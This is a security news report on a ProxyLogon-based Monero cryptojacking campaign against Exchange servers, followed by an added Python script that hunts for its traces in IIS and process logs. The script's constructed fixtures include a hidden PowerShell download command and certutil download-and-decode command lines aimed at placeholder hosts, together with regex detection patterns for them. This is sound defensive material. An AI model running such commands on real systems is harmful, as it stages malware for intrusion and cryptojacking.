Threat actors are exploiting the ProxyLogon vulnerabilities in unpatched Microsoft Exchange servers to install a malicious Monero cryptominer. Exchange servers compromised through ProxyLogon have already been hit with webshells and ransomware; in this campaign they are infected with the miner and also used to host the payload that is pushed to further victims, so any Exchange server still unpatched against ProxyLogon is exposed to this cryptojacking. The executables used in the attack are detected as Mal/Inject-GV and XMR-Stak Miner (PUA), and researchers have published a list of indicators to help organizations recognize whether they have been hacked in this way.
The attack begins with a PowerShell command that retrieves win_r.zip from the Outlook Web Access logon path of another compromised Exchange server. Despite its name, the file is a batch script. It invokes the Windows built-in certutil.exe to download two more files, win_s.zip and win_d.zip, both disguised as base64-encoded certificates, and then to decode them. The batch script writes the decoded executable to disk, extracts the miner and its configuration data, and injects the miner into a running system process; the files on disk are then deleted to remove evidence. Because the miner runs only inside the memory of the process it was injected into, little is left on disk for defenders to find. The attacker's Monero wallet began receiving funds on March 9, when Microsoft released updates to Exchange to patch the flaws. After that date the attacker lost many of the compromised servers, but has gained others since.
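The chain above leaves two hunt-worthy traces: on the compromised Exchange server that is hosting the payload, the IIS log shows archive files being served out of the OWA logon path, and on a victim host the process log shows PowerShell fetching a .zip from that path and certutil.exe downloading and decoding the follow-on files. The script below is an added example, not code from the original article or from the researchers; it assumes the OWA logon path is /owa/auth/, that the built-in downloader/decoder is certutil.exe, and that process events carry Sysmon-style image and command-line fields. All log lines and IP addresses in it are constructed for the example.

```python
"""Hunt for ProxyLogon cryptojacker staging in IIS and process-creation logs.

Added example. The IIS excerpt and process events below are constructed,
not real captures; the 203.0.113.x / 198.51.100.x addresses are documentation ranges.
"""
import re
from typing import Dict, Iterable, List

# Constructed IIS W3C log. Column order follows the "#Fields:" header, as real IIS logs do.
IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2021-03-10 08:14:02 10.0.0.5 GET /owa/auth/logon.aspx url=%2fowa 443 - 198.51.100.23 Mozilla/5.0 200
2021-03-10 08:14:09 10.0.0.5 POST /owa/auth.owa - 443 - 198.51.100.23 Mozilla/5.0 302
2021-03-10 08:15:41 10.0.0.5 GET /owa/auth/win_r.zip - 443 - 203.0.113.7 - 200
2021-03-10 08:16:00 10.0.0.5 GET /owa/auth/15.1.2176/themes/resources/favicon.ico - 443 - 198.51.100.23 Mozilla/5.0 200
"""

# Constructed Sysmon-style process-creation events (assumed field names: image, command_line).
PROCESS_EVENTS: List[Dict[str, str]] = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell -nop -w hidden -c "Invoke-WebRequest -Uri https://203.0.113.9/owa/auth/win_r.zip -OutFile C:\Windows\Temp\win_r.zip"'},
    {"image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil -urlcache -split -f https://203.0.113.9/owa/auth/win_s.zip C:\Windows\Temp\win_s.zip"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil -decode C:\Windows\Temp\win_s.zip C:\Windows\Temp\s.exe"},
    # Legitimate administrative use of certutil: verifies a certificate, must not be flagged.
    {"image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil -verify -urlfetch C:\Users\admin\cert.cer"},
    {"image": r"C:\Program Files\Microsoft\Exchange Server\V15\Bin\MSExchangeMailboxAssistants.exe",
     "command_line": r'"C:\Program Files\Microsoft\Exchange Server\V15\Bin\MSExchangeMailboxAssistants.exe"'},
]

# A static archive or executable served from the OWA logon directory is not normal OWA traffic.
OWA_PAYLOAD = re.compile(r"^/owa/auth/[^/]+\.(zip|exe|bat|ps1)$", re.IGNORECASE)
# certutil used as a downloader (-urlcache) or a base64 decoder (-decode).
CERTUTIL_ABUSE = re.compile(r"-(urlcache|decode)\b", re.IGNORECASE)
# PowerShell pulling a .zip out of an OWA logon path on some other server.
PS_ZIP_FETCH = re.compile(r"/owa/auth/\S+\.zip", re.IGNORECASE)


def parse_iis(text: str) -> List[Dict[str, str]]:
    """Parse W3C extended log lines, naming columns from the #Fields header."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # unexpected column count: skip rather than misalign fields
        rows.append(dict(zip(fields, values)))
    return rows


def hunt_iis(text: str) -> List[Dict[str, str]]:
    """Flag successful GETs for payload-like files served from /owa/auth/."""
    hits = []
    for row in parse_iis(text):
        if (row.get("cs-method") == "GET"
                and OWA_PAYLOAD.search(row.get("cs-uri-stem", ""))
                and row.get("sc-status") == "200"):
            hits.append({"rule": "owa_auth_payload_served",
                         "time": f'{row["date"]} {row["time"]}',
                         "client": row["c-ip"], "uri": row["cs-uri-stem"]})
    return hits


def hunt_processes(events: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Flag certutil download/decode and PowerShell fetches of .zip files from an OWA path."""
    hits = []
    for ev in events:
        image = ev.get("image", "").lower()
        cmd = ev.get("command_line", "")
        if image.endswith("\\certutil.exe") and CERTUTIL_ABUSE.search(cmd):
            hits.append({"rule": "certutil_download_or_decode", "command_line": cmd})
        elif image.endswith("\\powershell.exe") and PS_ZIP_FETCH.search(cmd):
            hits.append({"rule": "powershell_fetch_from_owa_auth", "command_line": cmd})
    return hits


if __name__ == "__main__":
    for hit in hunt_iis(IIS_LOG) + hunt_processes(PROCESS_EVENTS):
        print(hit)
```

The IIS rule catches the server that is acting as the payload host, which is the role the article says compromised servers play for the next round of victims; the process rules catch the victim side, where certutil decoding a "certificate" into an executable is the step worth alerting on even when the file names differ from win_s.zip and win_d.zip. Real certutil administration (the -verify event above) passes through untouched, and the decoded executable itself is gone by the time anyone looks, so these command-line traces are what remain.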
Read more: Attackers Target ProxyLogon Exploit to Install Cryptojacker